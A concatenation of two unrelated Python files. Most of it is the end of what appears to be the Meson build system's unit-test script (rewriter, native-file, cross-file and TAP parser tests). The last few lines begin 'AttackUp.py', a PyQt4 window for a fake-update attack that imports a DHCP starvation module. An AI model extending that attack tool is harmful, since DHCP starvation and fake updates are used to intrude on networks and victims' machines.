'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
raise SystemExit(main())
|
AttackUp.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Module.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
sshFile="Core/dark_style.css"
